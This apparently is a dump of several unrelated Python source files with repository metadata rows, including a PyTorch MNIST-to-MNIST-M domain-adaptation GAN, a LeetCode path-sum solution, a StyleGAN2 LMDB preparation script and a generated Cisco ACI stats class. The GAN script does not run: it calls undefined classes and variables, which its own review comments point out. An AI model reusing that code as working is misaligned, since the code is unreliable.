parser.add_argument('--n_residual_blocks', type=int, default=1, help='number of residual blocks in generator')
parser.add_argument('--latent_dim', type=int, default=10, help='dimensionality of the noise input')
parser.add_argument('--img_size', type=int, default=32, help='size of each image dimension')
parser.add_argument('--channels', type=int, default=3, help='number of image channels')
parser.add_argument('--n_classes', type=int, default=10, help='number of classes in the dataset')
parser.add_argument('--sample_interval', type=int, default=300, help='interval betwen image samples')
opt = parser.parse_args()
print(opt)

# Calculate output of image discriminator (PatchGAN):
# four stride-2 convolutions shrink each spatial dimension by 2**4.
patch = int(opt.img_size / 2**4)
patch = (1, patch, patch)

cuda = True if torch.cuda.is_available() else False
print("cuda : {}".format(cuda))
def weights_init_normal(m):
    """Initialize a module for GAN training.

    Conv* layers get weights ~ N(0, 0.02); BatchNorm* layers get weights
    ~ N(1, 0.02) and zero bias. Other module types are left untouched.
    Intended for use with ``model.apply(weights_init_normal)``.
    """
    layer_name = m.__class__.__name__
    print("classname : {}".format(layer_name))
    if 'Conv' in layer_name:
        torch.nn.init.normal_(m.weight.data, 0.0, 0.02)
    elif 'BatchNorm' in layer_name:
        torch.nn.init.normal_(m.weight.data, 1.0, 0.02)
        torch.nn.init.constant_(m.bias.data, 0.0)
class encode_ResidualBlock1(nn.Module):
    """First encoder stage: a 3x3 stride-2 conv (32 -> 64 channels by default)
    followed by batch-norm and LeakyReLU. ``forward`` also returns its input
    unchanged so later decoder stages can use it as a skip connection."""

    def __init__(self, in_features=32, out_features=64, kernel_size=3, stride=2, padding=1):
        super(encode_ResidualBlock1, self).__init__()
        stages = [
            nn.Conv2d(in_channels=in_features, out_channels=out_features,
                      kernel_size=kernel_size, stride=stride, padding=padding),
            nn.BatchNorm2d(out_features),
            nn.LeakyReLU(0.2, inplace=True),
        ]
        self.block = nn.Sequential(*stages)

    def forward(self, x):
        # Return (skip input, downsampled features).
        return x, self.block(x)
class encode_ResidualBlock2(nn.Module):
    """Second encoder stage: a 3x3 stride-2 conv (64 -> 128 channels by
    default) with batch-norm and LeakyReLU, halving the spatial size."""

    def __init__(self, in_features=64, out_features=128, kernel_size=3, stride=2, padding=1):
        super(encode_ResidualBlock2, self).__init__()
        stages = [
            nn.Conv2d(in_channels=in_features, out_channels=out_features,
                      kernel_size=kernel_size, stride=stride, padding=padding),
            nn.BatchNorm2d(out_features),
            nn.LeakyReLU(0.2, inplace=True),
        ]
        self.block = nn.Sequential(*stages)

    def forward(self, x):
        """Return the downsampled feature map."""
        return self.block(x)
class encode_ResidualBlock3(nn.Module):
    """Third encoder stage: a 3x3 stride-2 conv (128 -> 256 channels by
    default) with batch-norm and LeakyReLU, halving the spatial size."""

    def __init__(self, in_features=128, out_features=256, kernel_size=3, stride=2, padding=1):
        super(encode_ResidualBlock3, self).__init__()
        stages = [
            nn.Conv2d(in_channels=in_features, out_channels=out_features,
                      kernel_size=kernel_size, stride=stride, padding=padding),
            nn.BatchNorm2d(out_features),
            nn.LeakyReLU(0.2, inplace=True),
        ]
        self.block = nn.Sequential(*stages)

    def forward(self, x):
        """Return the downsampled feature map."""
        return self.block(x)
class decode_ResidualBlock1(nn.Module):
    """First decoder stage: a 3x3 stride-2 transposed conv (256 -> 128
    channels by default) with batch-norm and LeakyReLU, upsampling the map."""

    def __init__(self, in_features=256, out_features=128, kernel_size=3, stride=2, padding=1):
        super(decode_ResidualBlock1, self).__init__()
        stages = [
            nn.ConvTranspose2d(in_channels=in_features, out_channels=out_features,
                               kernel_size=kernel_size, stride=stride, padding=padding),
            nn.BatchNorm2d(out_features),
            nn.LeakyReLU(0.2, inplace=True),
        ]
        self.block = nn.Sequential(*stages)

    def forward(self, encode_x):
        """Return the upsampled feature map."""
        return self.block(encode_x)
class decode_ResidualBlock2(nn.Module):
    """Second decoder stage: a 3x3 stride-2 transposed conv (128 -> 64
    channels by default) with batch-norm and LeakyReLU, upsampling the map."""

    def __init__(self, in_features=128, out_features=64, kernel_size=3, stride=2, padding=1):
        super(decode_ResidualBlock2, self).__init__()
        stages = [
            nn.ConvTranspose2d(in_channels=in_features, out_channels=out_features,
                               kernel_size=kernel_size, stride=stride, padding=padding),
            nn.BatchNorm2d(out_features),
            nn.LeakyReLU(0.2, inplace=True),
        ]
        self.block = nn.Sequential(*stages)

    def forward(self, encode_x):
        """Return the upsampled feature map."""
        return self.block(encode_x)
class decode_ResidualBlock3(nn.Module):
    """Third decoder stage: a 3x3 stride-2 transposed conv (64 -> 32 channels
    by default) with batch-norm and LeakyReLU, upsampling the feature map."""

    def __init__(self, in_features=64, out_features=32, kernel_size=3, stride=2, padding=1):
        super(decode_ResidualBlock3, self).__init__()
        self.block = nn.Sequential(
            nn.ConvTranspose2d(in_channels=in_features, out_channels=out_features,
                               kernel_size=kernel_size, stride=stride, padding=padding),
            nn.BatchNorm2d(out_features),
            nn.LeakyReLU(0.2, inplace=True),
        )

    def forward(self, encode_x):
        """Return the upsampled feature map.

        Bug fix: the original called ``self.decode_block(encode_x)``, but no
        such attribute exists (``__init__`` stores ``self.block``), so every
        forward pass raised AttributeError.
        """
        return self.block(encode_x)
class encode_Generator(nn.Module):
    """Encoder half of the generator.

    Projects a noise vector to an image-shaped tensor, concatenates it with
    the input image along the channel axis, then runs three downsampling
    stages. Returns all intermediate features for decoder skip connections.
    """

    def __init__(self):
        super(encode_Generator, self).__init__()
        # Fully-connected layer which constructs an image-channel-shaped
        # output from the noise vector.
        self.fc = nn.Linear(opt.latent_dim, opt.channels*opt.img_size**2)
        self.l1 = nn.Sequential(nn.Conv2d(opt.channels*2, 32, 3, 1, 1), nn.ReLU(inplace=True))
        self.encode_resblocks1 = encode_ResidualBlock1()
        self.encode_resblocks2 = encode_ResidualBlock2()
        self.encode_resblocks3 = encode_ResidualBlock3()

    def forward(self, img, z):
        # Noise mapped to image shape, stacked with the image channel-wise.
        noise_img = self.fc(z).view(*img.shape)
        features = self.l1(torch.cat((img, noise_img), 1))
        skip, enc1 = self.encode_resblocks1(features)
        enc2 = self.encode_resblocks2(enc1)
        enc3 = self.encode_resblocks3(enc2)
        return skip, enc1, enc2, enc3
class decode_Generator(nn.Module):
    """Decoder half of the generator: upsamples encoder features back toward
    an image through three transposed-conv stages with skip connections.

    NOTE(review): this class has unresolved bugs -- see inline notes. The
    file is a ``.history`` snapshot, so it may be a mid-edit state.
    """

    def __init__(self):
        # NOTE(review): `Generator` is not defined in this file; this
        # presumably should be decode_Generator. As written, instantiation
        # raises NameError -- confirm the intended class name.
        super(Generator, self).__init__()
        # Fully-connected layer which constructs image channel shaped output from noise
        self.decode_resblocks1 = decode_ResidualBlock1()
        self.decode_resblocks2 = decode_ResidualBlock2()
        self.decode_resblocks3 = decode_ResidualBlock3()
        self.l2 = nn.Sequential(nn.Conv2d(32, opt.channels, 3, 1, 1), nn.Tanh())

    def forward(self, x, encode_out1, encode_out2, encode_out3):
        # Upsample the deepest features, adding the matching encoder output
        # (skip connection) at each stage.
        decode_out1 = encode_out2 + self.decode_resblocks1(encode_out3)
        decode_out2 = encode_out1 + self.decode_resblocks2(decode_out1)
        decode_out3 = x + self.decode_resblocks3(decode_out2)
        # Drop the extra row/column produced by the stride-2 transposed convs.
        decode_x = decode_out3[:, :, :-1, :-1]
        decode_x = F.sigmoid(decode_x)
        # NOTE(review): `img` is undefined in this scope (forward takes no
        # such parameter) -- this raises NameError; the intended residual
        # input image needs to be passed in. Confirm before use.
        out = img + decode_x
        img_ = self.l2(out)
        return img_
class encode_Discriminator(nn.Module):
    """PatchGAN discriminator over 512-channel encoder feature maps: four
    stride-2 conv stages, then a 1-channel conv producing per-patch scores."""

    def __init__(self):
        super(encode_Discriminator, self).__init__()

        def conv_stage(n_in, n_out, normalization=True):
            """One stride-2 conv + LeakyReLU stage, optionally instance-normalized."""
            stage = [nn.Conv2d(n_in, n_out, 3, stride=2, padding=1),
                     nn.LeakyReLU(0.2, inplace=True)]
            if normalization:
                stage.append(nn.InstanceNorm2d(n_out))
            return stage

        self.model = nn.Sequential(
            *conv_stage(512, 64, normalization=False),
            *conv_stage(64, 128),
            *conv_stage(128, 256),
            *conv_stage(256, 512),
            nn.Conv2d(512, 1, 3, 1, 1),
        )

    def forward(self, encode_x):
        """Return per-patch realness scores for the encoded features."""
        return self.model(encode_x)
class Discriminator(nn.Module):
    """PatchGAN discriminator over images: four stride-2 conv stages followed
    by a 1-channel conv producing a grid of per-patch realness scores."""

    def __init__(self):
        super(Discriminator, self).__init__()

        def conv_stage(n_in, n_out, normalization=True):
            """One stride-2 conv + LeakyReLU stage, optionally instance-normalized."""
            stage = [nn.Conv2d(n_in, n_out, 3, stride=2, padding=1),
                     nn.LeakyReLU(0.2, inplace=True)]
            if normalization:
                stage.append(nn.InstanceNorm2d(n_out))
            return stage

        self.model = nn.Sequential(
            *conv_stage(opt.channels, 64, normalization=False),
            *conv_stage(64, 128),
            *conv_stage(128, 256),
            *conv_stage(256, 512),
            nn.Conv2d(512, 1, 3, 1, 1),
        )

    def forward(self, img):
        """Return the patch validity map for `img`."""
        return self.model(img)
class Classifier(nn.Module):
    """Task classifier: four stride-2 conv stages feeding a softmax head over
    opt.n_classes classes."""

    def __init__(self):
        super(Classifier, self).__init__()

        def conv_stage(n_in, n_out, normalization=True):
            """One stride-2 conv + LeakyReLU stage, optionally instance-normalized."""
            stage = [nn.Conv2d(n_in, n_out, 3, stride=2, padding=1),
                     nn.LeakyReLU(0.2, inplace=True)]
            if normalization:
                stage.append(nn.InstanceNorm2d(n_out))
            return stage

        self.model = nn.Sequential(
            *conv_stage(opt.channels, 64, normalization=False),
            *conv_stage(64, 128),
            *conv_stage(128, 256),
            *conv_stage(256, 512),
        )

        # Four stride-2 stages shrink each spatial dimension by 2**4.
        input_size = opt.img_size // 2**4
        self.output_layer = nn.Sequential(
            nn.Linear(512*input_size**2, opt.n_classes),
            nn.Softmax(),
        )

    def forward(self, img):
        """Return class probabilities for `img`."""
        feats = self.model(img)
        feats = feats.view(feats.size(0), -1)
        return self.output_layer(feats)
# Loss function
adversarial_loss = torch.nn.MSELoss()         # LSGAN-style loss on decoded images
encode_adversarial_loss = torch.nn.MSELoss()  # LSGAN-style loss on encoder features
task_loss = torch.nn.CrossEntropyLoss()       # classification loss

# Loss weights
lambda_adv = 1
lambda_task = 0.1

# Initialize generator and discriminator
# NOTE(review): `target_encode_Generator` and `source_encode_Generator` are
# not defined anywhere in this file (only `encode_Generator` is) -- the next
# two lines raise NameError at import time. Confirm the intended class names.
target_encode_generator = target_encode_Generator()
source_encode_generator = source_encode_Generator()
decode_generator = decode_Generator()
encode_discriminator = encode_Discriminator()
discriminator = Discriminator()
classifier = Classifier()

if cuda:
    # Move every module and criterion to the GPU.
    target_encode_generator.cuda()
    source_encode_generator.cuda()
    decode_generator.cuda()
    encode_discriminator.cuda()
    discriminator.cuda()
    classifier.cuda()
    adversarial_loss.cuda()
    encode_adversarial_loss.cuda()
    task_loss.cuda()

# Initialize weights
target_encode_generator.apply(weights_init_normal)
source_encode_generator.apply(weights_init_normal)
decode_generator.apply(weights_init_normal)
encode_discriminator.apply(weights_init_normal)
discriminator.apply(weights_init_normal)
classifier.apply(weights_init_normal)

# Configure data loader: domain A is MNIST, domain B is MNIST-M.
os.makedirs('../../data/mnist', exist_ok=True)
dataloader_A = torch.utils.data.DataLoader(
    datasets.MNIST('../../data/mnist', train=True, download=True,
                   transform=transforms.Compose([
                       transforms.Resize(opt.img_size),
                       transforms.ToTensor(),
                       transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
                   ])),
    batch_size=opt.batch_size, shuffle=True)

os.makedirs('../../data/mnistm', exist_ok=True)
dataloader_B = torch.utils.data.DataLoader(
    MNISTM('../../data/mnistm', train=True, download=True,
           transform=transforms.Compose([
               transforms.Resize(opt.img_size),
               transforms.ToTensor(),
               transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
           ])),
    batch_size=opt.batch_size, shuffle=True)

# Optimizers: one over all generator+classifier parameters, one over both
# discriminators.
optimizer_G = torch.optim.Adam(itertools.chain(target_encode_generator.parameters(),
                                               source_encode_generator.parameters(),
                                               decode_generator.parameters(),
                                               classifier.parameters()),
                               lr=opt.lr, betas=(opt.b1, opt.b2))
optimizer_D = torch.optim.Adam(itertools.chain(encode_discriminator.parameters(), discriminator.parameters()), lr=opt.lr, betas=(opt.b1, opt.b2))

# Tensor factories selected once based on CUDA availability.
FloatTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
LongTensor = torch.cuda.LongTensor if cuda else torch.LongTensor
# ----------
# Training
# ----------

# Keeps 100 accuracy measurements
task_performance = []
target_performance = []

for epoch in range(opt.n_epochs):
    for i, ((imgs_A, labels_A), (imgs_B, labels_B)) in enumerate(zip(dataloader_A, dataloader_B)):

        batch_size = imgs_A.size(0)

        # Adversarial ground truths (one entry per PatchGAN output patch).
        valid = Variable(FloatTensor(batch_size, *patch).fill_(1.0), requires_grad=False)
        fake = Variable(FloatTensor(batch_size, *patch).fill_(0.0), requires_grad=False)
        encode_valid = Variable(FloatTensor(batch_size, *patch).fill_(1.0), requires_grad=False)
        encode_fake = Variable(FloatTensor(batch_size, *patch).fill_(0.0), requires_grad=False)

        # Configure input (MNIST is single-channel; expand to 3 channels).
        imgs_A = Variable(imgs_A.type(FloatTensor).expand(batch_size, 3, opt.img_size, opt.img_size))
        labels_A = Variable(labels_A.type(LongTensor))
        imgs_B = Variable(imgs_B.type(FloatTensor))

        # -----------------
        # Train Generator
        # -----------------

        optimizer_G.zero_grad()

        # Sample noise
        z = Variable(FloatTensor(np.random.uniform(-1, 1, (batch_size, opt.latent_dim))))

        # Generate a batch of images
        # NOTE(review): if source_encode_generator is meant to be an
        # encode_Generator, its forward returns FOUR tensors (not two), and
        # decode_Generator.forward expects four feature arguments (not two);
        # these calls do not match the class definitions above -- confirm.
        imgs_A_x, encode_fake_B = source_encode_generator(imgs_A, z)
        decode_fake_B = decode_generator(imgs_A_x, encode_fake_B)

        # Perform task on translated source image
        label_pred = classifier(decode_fake_B)

        # Calculate the task loss: average of the cross-entropy on the
        # translated image and on the original source image.
        task_loss_ = (task_loss(label_pred, labels_A) + \
                      task_loss(classifier(imgs_A), labels_A)) / 2

        # Loss measures generator's ability to fool the discriminator
        # (image-level GAN term + feature-level GAN term + weighted task term).
        g_loss = lambda_adv * adversarial_loss(discriminator(decode_fake_B), valid) + \
                 0.1 * encode_adversarial_loss(encode_discriminator(encode_fake_B), encode_valid) + \
                 lambda_task * task_loss_

        g_loss.backward()
        optimizer_G.step()

        # ---------------------
        # Train Discriminator
        # ---------------------

        optimizer_D.zero_grad()

        # NOTE(review): the "real" branch also runs target images through the
        # generator pipeline rather than scoring imgs_B directly -- confirm
        # this is the intended discriminator input.
        imgs_B_x, encode_real_B = source_encode_generator(imgs_B, z)
        decode_real_B = decode_generator(imgs_B_x, encode_real_B)

        # Measure discriminator's ability to classify real from generated samples
        encode_real_loss = encode_adversarial_loss(encode_discriminator(encode_real_B), encode_valid)
        encode_fake_loss = encode_adversarial_loss(encode_discriminator(encode_fake_B.detach()), encode_fake)
        decode_real_loss = adversarial_loss(discriminator(decode_real_B), valid)
        decode_fake_loss = adversarial_loss(discriminator(decode_fake_B.detach()), fake)
        encode_d_loss = (encode_real_loss + encode_fake_loss) / 2
        decode_d_loss = (decode_real_loss + decode_fake_loss) / 2
        d_loss = encode_d_loss + decode_d_loss

        d_loss.backward()
        optimizer_D.step()

        # ---------------------------------------
        # Evaluate Performance on target domain
        # ---------------------------------------

        # Evaluate performance on translated Domain A (rolling window of 100).
        acc = np.mean(np.argmax(label_pred.data.cpu().numpy(), axis=1) == labels_A.data.cpu().numpy())
        task_performance.append(acc)
        if len(task_performance) > 100:
            task_performance.pop(0)

        # Evaluate performance on Domain B (rolling window of 100).
        pred_B = classifier(imgs_B)
        target_acc = np.mean(np.argmax(pred_B.data.cpu().numpy(), axis=1) == labels_B.numpy())
        target_performance.append(target_acc)
        if len(target_performance) > 100:
            target_performance.pop(0)

        print ("[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f] [CLF acc: %3d%% (%3d%%), target_acc: %3d%% (%3d%%)]" %
               (epoch, opt.n_epochs,
                i, len(dataloader_A),
                d_loss.item(), g_loss.item(),
                100*acc, 100*np.mean(task_performance),
                100*target_acc, 100*np.mean(target_performance)))

        batches_done = len(dataloader_A) * epoch + i
        if batches_done % opt.sample_interval == 0:
            # Stack source / translated / target rows and save a sample grid.
            sample = torch.cat((imgs_A.data[:5], decode_fake_B.data[:5], imgs_B.data[:5]), -2)
            save_image(sample, 'images/%d.png' % batches_done, nrow=int(math.sqrt(batch_size)), normalize=True)
| [
"dolpal2@gmail.com"
] | dolpal2@gmail.com |
05391db40e348f679bd0fb7f3aff7fb9312e86dc | 6515dee87efbc5edfbf4c117e262449999fcbb50 | /cn/437.py | 9db648c3425be2e1fcd9d392cba20e26e2e594f9 | [] | no_license | wangyunge/algorithmpractice | 24edca77e180854b509954dd0c5d4074e0e9ef31 | 085b8dfa8e12f7c39107bab60110cd3b182f0c13 | refs/heads/master | 2021-12-29T12:55:38.096584 | 2021-12-12T02:53:43 | 2021-12-12T02:53:43 | 62,696,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 896 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution(object):
    def pathSum(self, root, targetSum):
        """Count downward paths whose node values sum to targetSum (LC 437).

        Prefix-sum technique: while walking root-to-leaf, a path ending at
        the current node sums to targetSum exactly when
        (running_sum - targetSum) already occurred as a prefix sum on the
        same root path.

        :type root: TreeNode
        :type targetSum: int
        :rtype: int
        """
        self.res = 0
        seen = {0: 1}  # empty prefix, so root-anchored paths are counted

        def walk(node, running):
            if node is None:
                return
            running += node.val
            self.res += seen.get(running - targetSum, 0)
            seen[running] = seen.get(running, 0) + 1
            walk(node.left, running)
            walk(node.right, running)
            # Backtrack: this prefix is no longer on the current path.
            seen[running] -= 1

        walk(root, 0)
        return self.res
| [
"wangyunge1@yahoo.com"
] | wangyunge1@yahoo.com |
2ce8806bfe4f7d6fc569bc79af8db82d2fc93e01 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_083/ch87_2020_06_22_18_11_23_637038.py | a6ce84b797d6cb26843f6f35d6d9f2edd6852dc2 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | preco_total = 0
# Sum the total cost from churras.txt, where each line has the form
# "item,quantity,unit_price".
preco_total = 0
with open('churras.txt', 'r') as arquivo:
    for linha in arquivo:
        # Bug fixes vs. the original:
        # - it called .strip() on the readlines() LIST (AttributeError),
        #   instead of on each line;
        # - it then indexed the raw line string (`listas[1]`, `listas[2]`)
        #   instead of the comma-split fields, so single characters were
        #   passed to int()/float().
        campos = linha.strip().split(',')
        preco_total += int(campos[1]) * float(campos[2])
print(preco_total)
"you@example.com"
] | you@example.com |
6e84f34b20b277f4cc2f6eed0c7053350f95dd5d | 0f8bb3285ae796ad0c000fb7f0d897bf9d92aef3 | /prepare_data.py | 0fc88eeb4834c5c2a6e425d93e78f9c45049e96b | [
"MIT",
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | viuts/stylegan2-pytorch | 3e23479ec53d5d8f39fcae6f5b95c2bb1f005a88 | 2fdd10b3e9e3261390032963c59646cd298a60b1 | refs/heads/master | 2020-12-04T22:04:35.950846 | 2020-01-11T05:08:35 | 2020-01-11T05:08:35 | 231,915,562 | 0 | 0 | NOASSERTION | 2020-01-05T12:40:25 | 2020-01-05T12:40:24 | null | UTF-8 | Python | false | false | 2,189 | py | import argparse
from io import BytesIO
import multiprocessing
from functools import partial
from PIL import Image
import lmdb
from tqdm import tqdm
from torchvision import datasets
from torchvision.transforms import functional as trans_fn
def resize_and_convert(img, size, quality=100):
    """Resize `img` to `size` with Lanczos, center-crop to a square of that
    size, and return the JPEG-encoded bytes at the given quality."""
    cropped = trans_fn.center_crop(trans_fn.resize(img, size, Image.LANCZOS), size)
    out = BytesIO()
    cropped.save(out, format='jpeg', quality=quality)
    return out.getvalue()
def resize_multiple(img, sizes=(128, 256, 512, 1024), quality=100):
    """Encode `img` as JPEG bytes at every resolution in `sizes`, in order."""
    return [resize_and_convert(img, size, quality) for size in sizes]
def resize_worker(img_file, sizes):
    """Pool worker: given (index, path), load the image as RGB and return
    (index, list of JPEG bytes, one per size)."""
    idx, path = img_file
    rgb = Image.open(path).convert('RGB')
    return idx, resize_multiple(rgb, sizes=sizes)
def prepare(transaction, dataset, n_worker, sizes=(128, 256, 512, 1024)):
    """Resize every image in `dataset` at all `sizes` (in parallel) and write
    the JPEG bytes into the LMDB `transaction` under keys
    "<size>-<zero-padded index>". A final "length" key records the count.
    """
    resize_fn = partial(resize_worker, sizes=sizes)

    # Sort by file path so indices are stable across runs, then tag each
    # file with its index (the ImageFolder label is discarded).
    files = sorted(dataset.imgs, key=lambda x: x[0])
    files = [(i, file) for i, (file, label) in enumerate(files)]
    total = 0

    with multiprocessing.Pool(n_worker) as pool:
        # imap_unordered: results arrive in any order, but each result
        # carries its own index i, so keys stay correct.
        for i, imgs in tqdm(pool.imap_unordered(resize_fn, files)):
            for size, img in zip(sizes, imgs):
                key = f'{size}-{str(i).zfill(5)}'.encode('utf-8')
                transaction.put(key, img)

            total += 1

        transaction.put('length'.encode('utf-8'), str(total).encode('utf-8'))
if __name__ == '__main__':
    # CLI: build an LMDB of multi-resolution JPEGs from an image folder.
    parser = argparse.ArgumentParser()
    parser.add_argument('--out', type=str)
    parser.add_argument('--size', type=str, default='128,256,512,1024')
    parser.add_argument('--n_worker', type=int, default=8)
    parser.add_argument('path', type=str)

    args = parser.parse_args()

    # Parse the comma-separated resolution list, e.g. "128,256" -> [128, 256].
    sizes = [int(s.strip()) for s in args.size.split(',')]

    print(f'Make dataset of image sizes:', ', '.join(str(s) for s in sizes))

    imgset = datasets.ImageFolder(args.path)

    # map_size is a 1 TiB virtual upper bound; readahead=False suits the
    # random-access write pattern.
    with lmdb.open(args.out, map_size=1024 ** 4, readahead=False) as env:
        with env.begin(write=True) as txn:
            prepare(txn, imgset, args.n_worker, sizes=sizes)
| [
"kim.seonghyeon@snu.ac.kr"
] | kim.seonghyeon@snu.ac.kr |
1e4a47dbddec9e8e9aea682ee7b2c0fd3003f97c | 3c000380cbb7e8deb6abf9c6f3e29e8e89784830 | /venv/Lib/site-packages/cobra/modelimpl/copp/arpdrop1year.py | 3bffde23d40d502aac18f85c8cd0529f3385b7c4 | [] | no_license | bkhoward/aciDOM | 91b0406f00da7aac413a81c8db2129b4bfc5497b | f2674456ecb19cf7299ef0c5a0887560b8b315d0 | refs/heads/master | 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,909 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class ArpDrop1year(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = StatsClassMeta("cobra.model.copp.ArpDrop1year", "Per Interface Drop Counters for Arp")
counter = CounterMeta("bytesRate", CounterCategory.GAUGE, "bytes-per-second", "ArpDropped Bytes rate")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "bytesRateLast"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "bytesRateMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "bytesRateMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "bytesRateAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "bytesRateSpct"
counter._propRefs[PropCategory.IMPLICIT_TOTAL] = "bytesRateTtl"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "bytesRateThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "bytesRateTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "bytesRateTr"
meta._counters.append(counter)
counter = CounterMeta("bytes", CounterCategory.COUNTER, "bytes", "ArpDropped Bytes")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "bytesLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "bytesCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "bytesPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "bytesMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "bytesMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "bytesAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "bytesSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "bytesBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "bytesThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "bytesTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "bytesTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "bytesRate"
meta._counters.append(counter)
counter = CounterMeta("pktsRate", CounterCategory.GAUGE, "packets-per-second", "ArpDropped Packets rate")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "pktsRateLast"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "pktsRateMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "pktsRateMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "pktsRateAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "pktsRateSpct"
counter._propRefs[PropCategory.IMPLICIT_TOTAL] = "pktsRateTtl"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "pktsRateThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "pktsRateTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "pktsRateTr"
meta._counters.append(counter)
counter = CounterMeta("pkts", CounterCategory.COUNTER, "packets", "ArpDropped Packets")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "pktsLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "pktsCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "pktsPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "pktsMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "pktsMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "pktsAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "pktsSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "pktsBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "pktsThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "pktsTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "pktsTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "pktsRate"
meta._counters.append(counter)
meta.moClassName = "coppArpDrop1year"
meta.rnFormat = "CDcoppArpDrop1year"
meta.category = MoCategory.STATS_CURRENT
meta.label = "current Per Interface Drop Counters for Arp stats in 1 year"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.svi.If")
meta.parentClasses.add("cobra.model.pc.AggrIf")
meta.parentClasses.add("cobra.model.l1.PhysIf")
meta.parentClasses.add("cobra.model.l3.RtdIf")
meta.parentClasses.add("cobra.model.l3.EncRtdIf")
meta.superClasses.add("cobra.model.copp.ArpDrop")
meta.superClasses.add("cobra.model.stats.Item")
meta.superClasses.add("cobra.model.stats.Curr")
meta.rnPrefixes = [
('CDcoppArpDrop1year', False),
]
prop = PropMeta("str", "bytesAvg", "bytesAvg", 31338, PropCategory.IMPLICIT_AVG)
prop.label = "ArpDropped Bytes average value"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesAvg", prop)
prop = PropMeta("str", "bytesBase", "bytesBase", 31333, PropCategory.IMPLICIT_BASELINE)
prop.label = "ArpDropped Bytes baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesBase", prop)
prop = PropMeta("str", "bytesCum", "bytesCum", 31334, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "ArpDropped Bytes cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesCum", prop)
prop = PropMeta("str", "bytesLast", "bytesLast", 31332, PropCategory.IMPLICIT_LASTREADING)
prop.label = "ArpDropped Bytes current value"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesLast", prop)
prop = PropMeta("str", "bytesMax", "bytesMax", 31337, PropCategory.IMPLICIT_MAX)
prop.label = "ArpDropped Bytes maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesMax", prop)
prop = PropMeta("str", "bytesMin", "bytesMin", 31336, PropCategory.IMPLICIT_MIN)
prop.label = "ArpDropped Bytes minimum value"
